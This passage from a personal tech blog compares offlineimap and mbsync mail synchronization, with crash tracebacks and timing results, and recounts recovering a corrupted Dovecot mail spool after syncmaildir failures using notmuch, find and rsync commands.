  File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__
    cls.parse(value, kwds)
  File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse
    kwds['parse_tree'] = parse_tree = cls.value_parser(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header
    ctype.append(parse_mime_parameters(value[1:]))
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters
    token, value = get_parameter(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter
    token, value = get_value(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value
    token, value = get_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string
    token, value = get_bare_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string
    token, value = get_encoded_word(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word
    text, charset, lang, defects = _ew.decode('=?' + tok + '?=')
  File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode
    string = bstring.decode(charset)
AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Last 1 debug messages logged for Copy message from RemoteAnarcat:junk prior to exception:
thread: Register new thread 'Copy message from RemoteAnarcat:junk' (account 'Anarcat')
ERROR: Exceptions occurred during the run!
ERROR: Copying message 30624 [acc: Anarcat]
  decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 802, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 342, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 908, in _fetch_from_imap
    ndata1 = self.parser['8bit-RFC'].parsebytes(data[0][1])
  File "/usr/lib/python3.9/email/parser.py", line 123, in parsebytes
    return self.parser.parsestr(text, headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 67, in parsestr
    return self.parse(StringIO(text), headersonly=headersonly)
  File "/usr/lib/python3.9/email/parser.py", line 56, in parse
    feedparser.feed(data)
  File "/usr/lib/python3.9/email/feedparser.py", line 176, in feed
    self._call_parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 180, in _call_parse
    self._parse()
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 298, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 385, in _parsegen
    for retval in self._parsegen():
  File "/usr/lib/python3.9/email/feedparser.py", line 256, in _parsegen
    if self._cur.get_content_type() == 'message/delivery-status':
  File "/usr/lib/python3.9/email/message.py", line 578, in get_content_type
    value = self.get('content-type', missing)
  File "/usr/lib/python3.9/email/message.py", line 471, in get
    return self.policy.header_fetch_parse(k, v)
  File "/usr/lib/python3.9/email/policy.py", line 163, in header_fetch_parse
    return self.header_factory(name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 601, in __call__
    return self[name](name, value)
  File "/usr/lib/python3.9/email/headerregistry.py", line 196, in __new__
    cls.parse(value, kwds)
  File "/usr/lib/python3.9/email/headerregistry.py", line 445, in parse
    kwds['parse_tree'] = parse_tree = cls.value_parser(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2675, in parse_content_type_header
    ctype.append(parse_mime_parameters(value[1:]))
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2569, in parse_mime_parameters
    token, value = get_parameter(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2492, in get_parameter
    token, value = get_value(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 2403, in get_value
    token, value = get_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1294, in get_quoted_string
    token, value = get_bare_quoted_string(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1223, in get_bare_quoted_string
    token, value = get_encoded_word(value)
  File "/usr/lib/python3.9/email/_header_value_parser.py", line 1064, in get_encoded_word
    text, charset, lang, defects = _ew.decode('=?' + tok + '?=')
  File "/usr/lib/python3.9/email/_encoded_words.py", line 181, in decode
    string = bstring.decode(charset)
Folder junk [acc: Anarcat]:
 Copy message UID 30626 (29008/49310) RemoteAnarcat:junk -> LocalAnarcat:junk
Command exited with non-zero status 100
5252.91user 535.86system 3:21:00elapsed 47%CPU (0avgtext+0avgdata 846304maxresident)k
96344inputs+26563792outputs (1189major+2155815minor)pagefaults 0swaps
That only transferred about 8GB of mail, which gives us a transfer rate of 5.3Mbit/s, more than 5 times slower than mbsync. This bug is possibly limited to the bullseye version of offlineimap3 (the lovely 0.0~git20210225.1e7ef9e+dfsg-4), while the current sid version (the equally gorgeous 0.0~git20211018.e64c254+dfsg-1) seems unaffected.

Tolerable performance The new release still crashes, except it does so at the very end, which is an improvement, since the mails do get transferred:
 *** Finished account 'Anarcat' in 511:12
ERROR: Exceptions occurred during the run!
ERROR: Exception parsing message with ID (<20190619152034.BFB8810E07A@marcos.anarc.at>) from imaplib (response type: bytes).
 AttributeError: decoding with 'X-EUC-TW' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap
    raise OfflineImapError(
ERROR: Exception parsing message with ID (<40A270DB.9090609@alternatives.ca>) from imaplib (response type: bytes).
 AttributeError: decoding with 'x-mac-roman' codec failed (AttributeError: 'memoryview' object has no attribute 'decode')
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 910, in _fetch_from_imap
    raise OfflineImapError(
ERROR: IMAP server 'RemoteAnarcat' does not have a message with UID '32686'
Traceback:
  File "/usr/share/offlineimap3/offlineimap/folder/Base.py", line 810, in copymessageto
    message = self.getmessage(uid)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 343, in getmessage
    data = self._fetch_from_imap(str(uid), self.retrycount)
  File "/usr/share/offlineimap3/offlineimap/folder/IMAP.py", line 889, in _fetch_from_imap
    raise OfflineImapError(reason, severity)
Command exited with non-zero status 1
8273.52user 983.80system 8:31:12elapsed 30%CPU (0avgtext+0avgdata 841936maxresident)k
56376inputs+43247608outputs (811major+4972914minor)pagefaults 0swaps
"offlineimap  -o " took 8 hours 31 mins 15 secs
This is 8h31m for transferring 12G, which is around 3.1Mbit/s. That is nine times slower than mbsync, almost an order of magnitude! Now that we have a full sync, we can test incremental synchronization. That is also much slower:
===> multitime results
1: sh -c "offlineimap -o   true"
            Mean        Std.Dev.    Min         Median      Max
real        24.639      0.513       23.946      24.526      25.708      
user        23.912      0.473       23.404      23.795      24.947      
sys         1.743       0.105       1.607       1.729       2.002
That is also an order of magnitude slower than mbsync, and significantly slower than what you'd expect from a sync process. ~30 seconds is long enough to make me impatient and distracted; 3 seconds, less so: I can wait and see the results almost immediately.

Integrity check That said: this is still on a gigabit link. It's technically possible that OfflineIMAP performs better than mbsync over a slow link, but I Haven't tested that theory. The OfflineIMAP mail spool is missing quite a few messages as well:
anarcat@angela:~(main)$ find Maildir-offlineimap -type f -type f -a \! -name '.*'   wc -l 
381463
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*'   wc -l 
385247
... although that's probably all either new messages or the register folder, so OfflineIMAP might actually be in a better position there. But digging in more, it seems like the actual per-folder diff is fairly similar to mbsync: a few messages missing here and there. Considering OfflineIMAP's instability and poor performance, I have not looked any deeper in those discrepancies.

Other projects to evaluate Those are all the options I have considered, in alphabetical order
  • doveadm-sync: requires dovecot on both ends, can tunnel over SSH, may have performance issues in incremental sync, written in C
  • fdm: fetchmail replacement, IMAP/POP3/stdin/Maildir/mbox,NNTP support, SOCKS support (for Tor), complex rules for delivering to specific mailboxes, adding headers, piping to commands, etc. discarded because no (real) support for keeping mail on the server, and written in C
  • getmail: fetchmail replacement, IMAP/POP3 support, supports incremental runs, classification rules, Python
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap, but requires running an IMAP server locally, Perl
  • isync/mbsync: TLS client certs and SSH tunnels, fast, incremental, IMAP/POP/Maildir support, multiple mailbox, trash and recursion support, and generally has good words from multiple Debian and notmuch people (Arch tutorial), written in C, review above
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, mentions rsmtp which is a nice name for rsendmail. not evaluated because it seems awfully complex to setup, Haskell
  • nncp: treat the local spool as another mail server, not really compatible with my "multiple clients" setup, Golang
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, review above, Python
Most projects were not evaluated due to lack of time.

Conclusion I'm now using mbsync to sync my mail. I'm a little disappointed by the synchronisation times over the slow link, but I guess that's on par for the course if we use IMAP. We are bound by the network speed much more than with custom protocols. I'm also worried about the C implementation and the crashes I have witnessed, but I am encouraged by the fast upstream response. Time will tell if I will stick with that setup. I'm certainly curious about the promises of interimap and mail-sync, but I have ran out of time on this project.

Antoine Beaupr : The last syncmaildir crash

My syncmaildir (SMD) setup failed me one too many times (previously, previously). In an attempt to migrate to an alternative mail synchronization tool, I looked into using my IMAP server again, and found out my mail spool was in a pretty bad shape. I'm comparing mbsync and offlineimap in the next post but this post talks about how I recovered the mail spool so that tools like those could correctly synchronise the mail spool again.

The latest crash On Monday, SMD just started failing with this error:
nov 15 16:12:19 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:12:22 angela systemd[2305]: smd-pull.service: Succeeded.
nov 15 16:12:22 angela systemd[2305]: Finished pull emails with syncmaildir.
nov 15 16:14:08 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:14:11 angela systemd[2305]: Failed to start pull emails with syncmaildir.
nov 15 16:16:14 angela systemd[2305]: Starting pull emails with syncmaildir...
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Unable to get any data from the other endpoint.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: This problem may be transient, please retry.
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Hint: did you correctly setup the SERVERNAME variable
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: on your client? Did you add an entry for it in your ssh
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: configuration file?
nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error
nov 15 16:16:17 angela smd-pull[27188]: register: smd-client@localhost: TAGS: error::context(handshake) probable-cause(network) human-intervention(avoidable) suggested-actions(retry)
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE
nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'.
nov 15 16:16:17 angela systemd[2305]: Failed to start pull emails with syncmaildir.
What is frustrating is that there's actually no network error here. Running the command by hand I did see a different message, but now I have lost it in my backlog. It had something to do with a filename being too long, and I gave up debugging after a while. This happened suddenly too, which added to the confusion. In a fit of rage I started this blog post and experimenting with alternatives, which led me down a lot of rabbit holes. Reviewing my previous mail crash documentation, it seems most solutions involve talking to an IMAP server, so I figured I would just do that. Wanting to try something new, i gave isync (AKA mbsync) a try. Oh dear, I did not expect how much trouble just talking to my IMAP server would be, which wasn't not isync's fault, for what that's worth. It was the primary tool I used to debug things, and served me well in that regard.

Mailbox corruption The first thing I found out is that certain messages in the IMAP spool were corrupted. mbsync would stop on a FETCH command and Dovecot would give me those errors on the server side.

"wrong W value"
nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Maildir filename has wrong W value, renamed the file from /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S to /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495:2,S
nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Deleting corrupted cache record uid=1582: UID 1582: Broken virtual size in mailbox junk: read(/home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S): FETCH BODY[] got too little data: 2540 vs 2578
At least this first error was automatically healed by Dovecot (by renaming the file without the W= flag). The problem is that the FETCH command fails and mbsync exits noisily. So you need to constantly restart mbsync with a silly command like:
while ! mbsync -a; do sleep 1; done

"cached message size larger than expected"
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=mail stream)
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: Deleting corrupted cache record uid=19288: UID 19288: Broken physical size in mailbox Sent: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288)
nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=)
nov 16 13:53:08 marcos dovecot[3520770]: imap-login: Panic: epoll_ctl(del, 7) failed: Bad file descriptor
This second problem is much harder to fix, because dovecot does not recover automatically. This is Dovecot complaining that the cached size (the S= field, but also present in Dovecot's metadata files) doesn't match the file size. I wonder if at least some of those messages were corrupted in the OfflineIMAP to syncmaildir migration because part of that procedure is to run the strip_header script to remove content from the emails. That could easily have broken things since the files do not also get renamed.

Workaround So I read a lot of the Dovecot documentation on the maildir format, and wrote an extensive fix script for those two errors. The script worked and mbsync was able to sync the entire mail spool. And no, rebuilding the index files didn't work. Also tried doveadm force-resync -u anarcat which didn't do anything. In the end I also had to do this, because the wrong cache values were also stored elsewhere.
service dovecot stop ; find -name 'dovecot*' -delete; service dovecot start
This would have totally broken any existing clients, but thankfully I'm starting from scratch (except maybe webmail, but I'm hoping it will self-heal as well, assuming it only has a cache and not a full replica of the mail spool).

Incoherence between Maildir and IMAP Unfortunately, the first mbsync was incomplete as it was missing about 15,000 mails:
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*'   wc -l 
384836
anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*'   wc -l 
369221
As it turns out, mbsync was not at fault here either: this was yet more mail spool corruption. It's actually 26 folders (out of 205) with inconsistent sizes, which can be found with:
for folder in * .[^.]* ; do 
  printf "%s\t%d\n" $folder $(find "$folder" -type f -a \! -name '.*'   wc -l );
done
The special \! -name '.*' bit is to ignore the mbsync metadata, which creates .uidvalidity and .mbsyncstate in every folder. That ignores about 200 files but since they are spread around all folders, which was making it impossible to review where the problem was. Here is what the diff looks like:
--- Maildir-list    2021-11-17 20:42:36.504246752 -0500
+++ Maildir-mbsync-list 2021-11-17 20:18:07.731806601 -0500
@@ -6,16 +6,15 @@
[...]
 .Archives  1
 .Archives.2010 3553
-.Archives.2011 3583
-.Archives.2012 12593
+.Archives.2011 3582
+.Archives.2012 620
 .Archives.2013 8576
 .Archives.2014 11057
-.Archives.2015 8173
+.Archives.2015 8165
 .Archives.2016 54
 .band  34
 .bitbuck   1
@@ -38,13 +37,12 @@
 .couchsurfers  2
-cur    11285
+cur    11280
 .current   130
 .cv    2
 .debbug    262
-.debian    37544
-drafts 1
-.Drafts    4
+.debian    37533
+.Drafts    2
 .drone 241
 .drupal    188
 .drupal-devel  303
[...]

Misfiled messages It's a bit all over the place, but we can already notice some huge differences between mailboxes, for example in the Archives folders. As it turns out, at least 12,000 of those missing mails were actually misfiled: instead of being in the Maildir/.Archives.2012/cur/ folder, they were directly in Maildir/.Archives.2012/. This is something that doesn't matter for SMD (and possibly for notmuch? it does matter, notmuch suddenly found 12,000 new mails) but that definitely matters to Dovecot and therefore mbsync... After moving those files around, we still have 4,000 message missing:
anarcat@angela:~(main)$ find Maildir-mbsync/  -type f -a \! -name '.*'   wc -l 
381196
anarcat@angela:~(main)$ find Maildir/  -type f -a \! -name '.*'   wc -l 
385053
The problem is that those 4,000 missing mails are harder to track. Take, for example, .Archives.2011, which has a single message missing, out of 3,582. And the files are not identical: the checksums don't match after going through the IMAP transport, so we can't use a tool like hashdeep to compare the trees and find why any single file is missing.

"register" folder One big chunk of the 4,000, however, is a special folder called register in my spool, which I am syncing separately (see Securing registration email for details on that setup). That actually covers 3,700 of those messages, so I actually have a more modest 300 messages to figure out, after (easily!) configuring mbsync to sync that folder separately:
 @@ -30,9 +33,29 @@ Slave :anarcat-local:
  # Exclude everything under the internal [Gmail] folder, except the interesting folders
  #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail"
  # Or include everything
 -Patterns *
 +#Patterns *
 +Patterns * !register  !.register
  # Automatically create missing mailboxes, both locally and on the server
  #Create Both
  Create slave
  # Sync the movement of messages between folders and deletions, add after making sure the sync works
  #Expunge Both
 +
 +IMAPAccount anarcat-register
 +Host imap.anarc.at
 +User register
 +PassCmd "pass imap.anarc.at-register"
 +SSLType IMAPS
 +CertificateFile /etc/ssl/certs/ca-certificates.crt
 +
 +IMAPStore anarcat-register-remote
 +Account anarcat-register
 +
 +MaildirStore anarcat-register-local
 +SubFolders Maildir++
 +Inbox ~/Maildir-mbsync/.register/
 +
 +Channel anarcat-register
 +Master :anarcat-register-remote:
 +Slave :anarcat-register-local:
 +Create slave

"tmp" folders and empty messages After syncing the "register" messages, I end up with the measly little 160 emails out of sync:
anarcat@angela:~(main)$ find Maildir-mbsync/  -type f -a \! -name '.*'   wc -l 
384900
anarcat@angela:~(main)$ find Maildir/  -type f -a \! -name '.*'   wc -l 
385059
Argh. After more digging, I have found 131 mails in the tmp/ directories of the client's mail spool. Mysterious! On the server side, it's even more files, and not the same ones. Possible that those were mails that were left there during a failed delivery of some sort, during a power failure or some sort of crash? Who knows. It could be another race condition in SMD if it runs while mail is being delivered in tmp/... The first thing to do with those is to cleanup a bunch of empty files (21 on angela):
find .[^.]*/tmp -type f -empty -delete
As it turns out, they are all duplicates, in the sense that notmuch can easily find a copy of files with the same message ID in its database. In other words, this hairy command returns nothing
find .[^.]*/tmp -type f   while read path; do
  msgid=$(grep -m 1  -i ^message-id "$path"   sed 's/Message-ID: //i;s/[<>]//g');
  if notmuch count --exclude=false  "id:$msgid"   grep -q 0; then
    echo "$path <$msgid> not in notmuch" ;
  fi;
done
... which is good. Or, to put it another way, this is safe:
find .[^.]*/tmp -type f -delete
Poof! 314 mails cleaned on the server side. Interestingly, SMD doesn't pick up on those changes at all and still sees files in tmp/ directories on the client side, so we need to operate the same twisted logic there.

notmuch to the rescue again After cleaning that on the client, we get:
anarcat@angela:~(main)$ find Maildir/  -type f -a \! -name '.*'   wc -l 
384928
anarcat@angela:~(main)$ find Maildir-mbsync/  -type f -a \! -name '.*'   wc -l 
384901
Ha! 27 mails difference. Those are the really sticky, unclear ones. I was hoping a full sync might clear that up, but after deleting the entire directory and starting from scratch, I end up with:
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*'   wc -l 
385034
anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*'   wc -l 
384993
That is: even more messages missing (now 37). Sigh. Thankfully, this is something notmuch can help with: it can index all files by Message-ID (which I learned is case-insensitive, yay) and tell us which messages don't make it through. Considering the corruption I found in the mail spool, I wouldn't be the least surprised those messages are just skipped by the IMAP server. Unfortunately, there's nothing on the Dovecot server logs that would explain the discrepancy. Here again, notmuch comes to the rescue. We can list all message IDs to figure out that discrepancy:
notmuch search --exclude=false --output=messages '*'   pv -s 18M   sort > Maildir-msgids
notmuch --config=.notmuch-config-mbsync search --exclude=false --output=messages '*'   pv -s 18M   sort > Maildir-mbsync-msgids
And then we can see how many messages notmuch thinks are missing:
$ wc -l *msgids
372723 Maildir-mbsync-msgids
372752 Maildir-msgids
That's 29 messages. Oddly, it doesn't exactly match the find output:
anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*'   wc -l 
385204
anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*'   wc -l 
385241
That is 10 more messages. Ugh. But actually, I know what those are: more misfiled messages (in a .folder/draft/ directory, bizarrely, so the totals actually match. In the notmuch output, there's a lot of stuff like this:
id:notmuch-sha1-fb880d673e24f5dae71b6b4d825d4a0d5d01cde4
Those are messages without a valid Message-ID. Notmuch (presumably) constructs one based on the file's checksum. Because the files differ between the IMAP server and the local mail spool (which is unfortunate, but possibly inevitable), those do not match. There are exactly the same number of those on both sides, so I'll go ahead and assume those are all accounted for. What remains is:
anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids    grep '^\-[^-]'   grep -v sha1   wc -l 
2
anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids    grep '^\+[^+]'   grep -v sha1   wc -l 
21
anarcat@angela:~(main)$ 
ie. 21 missing from mbsync, and, surprisingly, 2 missing from the original mail spool. Further inspection also showed they were all messages with some sort of "corruption": no body and only headers. I am not sure that is a legal email format in the first place. Since they were mostly spam or administrative emails ("You have been unsubscribed from mailing list..."), it seems fairly harmless to ignore those.

Conclusion As we'll see in the next article, SMD has stellar performance. But that comes at a huge cost: it accesses the mail storage directly. This can (and has) created significant problems on the mail server. It's unclear exactly why those things happen, but Dovecot expects a particular storage format on its file, and it seems unwise to bypass that. In the future, I'll try to remember to avoid that, especially since mechanisms like SMD require special server access (SSH) which, in the long term, I am not sure I want to maintain or expect. In other words, just talking with an IMAP server opens up a lot more possibilities of hosting than setting up a custom synchronisation protocol over SSH. It's also safer and more reliable, as we have seen. Thankfully, I've been able to recover from all the errors I could find, but it could have gone differently and it would have been possible for SMD to permanently corrupt significant part of my mail archives. In the end, however, the last drop was just another weird bug which, ironically, SMD mysteriously recovered from on its own while I was writing this documentation and migrating away from it. In any case, I recommend SMD users start looking for alternatives. The project has been archived upstream, and the Debian package has been orphaned. I have seen significant mail box corruption, including entire mail spool destruction, mostly due to incorrect locking code. I have filed a release-critical bug in Debian to make sure it doesn't ship with Debian bookworm. Alternatives like mbsync provide fast and reliable transport, including over SSH. See the next article for further discussion of the alternatives.

29 June 2021

Antoine Beaupr : Another syncmaildir crash

So I had another major email crash with my syncmaildir setup. This time I was at least able to confirm the issue, and I still haven't lost mail thanks to backups and sheer luck (again).

The crash It is not really worth going over the crash in details, it's fairly similar to the last one: something bad happened and smd started destroying everything. The hint is that it takes a long time to do what usually takes seconds. It helps that I now have a second monitor showing logs. I still lost much more mail than the last time. I used to have "301 723 messages", according to notmuch. But then when I ran smd-pull by hand, it was telling me:
95K emails scanned
Oops. You can see notmuch happily noticing the destroyed files on the server:
jun 28 16:33:40 marcos notmuch[28532]: No new mail. Removed 65498 messages. Detected 1699 file renames.
jun 28 16:36:05 marcos notmuch[29746]: No new mail. Removed 68883 messages. Detected 2488 file renames.
jun 28 16:41:40 marcos notmuch[31972]: No new mail. Removed 118295 messages. Detected 3657 file renames.
The final count ended up being 81 042 messages, according to notmuch. A whopping 220 000 mails deleted. The interesting bit, this time around, is that I caught smd in the act of running two processes in parallel:
jun 28 16:30:09 curie systemd[2845]: Finished pull emails with syncmaildir. 
jun 28 16:30:09 curie systemd[2845]: Starting push emails with syncmaildir... 
jun 28 16:30:09 curie systemd[2845]: Starting pull emails with syncmaildir... 
So clearly that is the source of the bug.

Recovery Emergency stop on curie:
notmuch dump > notmuch.dump
systemctl --user --now disable smd-pull.service smd-pull.timer smd-push.service smd-push.timer notmuch-new.service notmuch-new.timer
On marcos (the server), guessed the number of messages delivered since the last backup to be 71, just looking at timestamps in the mail log. Made a list:
grep postfix/local /var/log/mail.log   tail -71 > lost-mail
Found postfix queue IDs:
sed 's/.*\]://;s/:.*//' lost-mail > qids
Turn those into message IDs, find those that are missing from the disk (had previously ran notmuch new just to be sure it's up to date):
while read qid ; do 
    grep "$qid: message-id" /var/log/mail.log
done < qids    sed 's/.*message-id=<//;s/>//'   while read msgid; do
    sudo -u anarcat notmuch count --exclude=false id:$msgid   grep -q 0 && echo $msgid
done
Copy this back on curie as missing-msgids and:
$ wc -l missing-msgids 
48 missing-msgids
$ while read msgid ; do notmuch count --exclude=false id:$msgid   grep -q 0 && echo $msgid ; done < missing-msgids
mailman.189.1624881611.23397.nodes-reseaulibre.ca@reseaulibre.ca
AnwMy7rdSpK-N-vt4AiOag@ismtpd0148p1mdw1.sendgrid.net
only two mails missing! whoohoo! Copy those back onto marcos as really-missing-msgids, and look at the full mail logs to see what they are:
~anarcat/src/koumbit-scripts/mail/postfix-trace --from-file really-missing-msgids2
I actually remembered deleting those, so no mail lost! Rebuild the list of msgids that were lost, on marcos:
while read qid ; do grep "$qid: message-id" /var/log/mail.log; done < qids    sed 's/.*message-id=<//;s/>//'
Copy that on curie as lost-mail-msgids, then copy the files over in a test dir:
while read msgid ; do
    notmuch search --output=files --exclude=false "id:$msgid"
done < lost-mail-msgids   sed 's#/home/anarcat/Maildir/##'   rsync -v  --files-from=- /home/anarcat/Maildir/ shell.anarc.at:restore/Maildir-angela/
If that looks about right, on marcos:
find restore/Maildir-angela/ -type f   wc -l
... should match the number of missing mails, roughly. Copy if in the real spool:
while read msgid ; do
    notmuch search --output=files --exclude=false "id:$msgid"
done < lost-mail-msgids   sed 's#/home/anarcat/Maildir/##'   rsync -v  --files-from=- /home/anarcat/Maildir/ shell.anarc.at:Maildir/
Then on the server, notmuch new should find the new emails, and we shouldn't have any lost mail anymore:
while read qid ; do grep "$qid: message-id" /var/log/mail.log; done < qids    sed 's/.*message-id=<//;s/>//'   while read msgid; do sudo -u anarcat notmuch count --exclude=false id:$msgid   grep -q 0 && echo $msgid ; done
Then, crucial moment, try to pull the new mails from the backups on curie:
anarcat@curie:~(main)$ smd-pull  -n  --show-tags -v
Found lockfile of a dead instance. Ignored.
Phase 0: handshake
Phase 1: changes detection
    5K emails scanned
   10K emails scanned
   15K emails scanned
   20K emails scanned
   25K emails scanned
   30K emails scanned
   35K emails scanned
   40K emails scanned
   45K emails scanned
   50K emails scanned
Phase 2: synchronization
Phase 3: agreement
default: smd-client@localhost: TAGS: stats::new-mails(49687), del-mails(0), bytes-received(215752279), xdelta-received(3703852)
"smd-pull  -n  --show-tags -v" took 3 mins 39 secs
This brought me back to the state after the backup plus the mails delivered during the day, which means I had to catchup with all my holiday's read emails (1440 mails!) but thankfully I made a dump of the notmuch database on curie at the start of the procedure, so this actually restored a sane state:
pv notmuch.dump   notmuch restore
Phew!

Workaround I have filed this as a bug in upstream issue 18. Considering I filed 11 issues and only 3 of those were closed, I'm not holding my breath. I nevertheless filed PR 19 in the hope that this will fix my particular issue, but I'm not even sure this is the right fix...

Fix At this point, I'm really ready to give up on SMD. It's really, really nice to be able to sync mail over SSH because I don't need to store my IMAP password on disk. But surely there are more reliable syncing mechanisms. I do not remember ever losing that much mail before. At worst, offlineimap would duplicate emails like mad, but never destroy my entire mail spool that way. As mentioned before, there are other programs that sync mail. I'm looking at:
  • offlineimap3: requires IMAP, used the py2 version in the past, might just still work, first sync painful (IIRC), ways to tunnel over SSH, see comment below
  • isync/mbsync: might be faster, I remember having trouble switching from offlineimap to this, has support for TLS client certs, running over SSH, and generally has good words from multiple Debian and notmuch people
  • getmail: just downloads email, might not be enough
  • nncp: treat the local spool as another mail server, might not be compatible with my "multiple clients" setup
  • doveadm-sync: requires dovecot on both ends, but supports using SSH to sync, will try this next, may have performance problems, see comment below
  • interimap: syncs two IMAP servers, apparently faster than doveadm and offlineimap
  • mail-sync: notify support, happens over any piped transport (e.g. ssh), diff/patch system, requires binary on both ends, mentions UUCP in the manpage, seems awfully complicated to setup, mentions rsmtp which is a nice name for rsendmail

23 March 2021

Antoine Beaupr : Major email crash with syncmaildir

TL:DR; lost half my mail (150,000 messages, ~6GB) last night. Cause uncertain, but possibly a combination of a dead CMOS battery, systemd OnCalendar=daily, a (locking?) bug in syncmaildir, and generally, a system too exotic and complicated.

The crash So I somehow lost half my mail:
anarcat@angela:~(main)$ du -sh Maildir/
7,9G    Maildir/
anarcat@curie:~(main)$ du -sh Maildir
14G     Maildir
anarcat@marcos:~$ du -sh Maildir
8,0G    Maildir
Those are three different machines:
  • angela: my laptop, not always on
  • curie: my workstation, mostly always on
  • marcos: my mail server, always on
Those mails are synchronized using a rather exotic system based on SSH, syncmaildir and rsendmail. The anomaly started on curie:
-- Reboot --
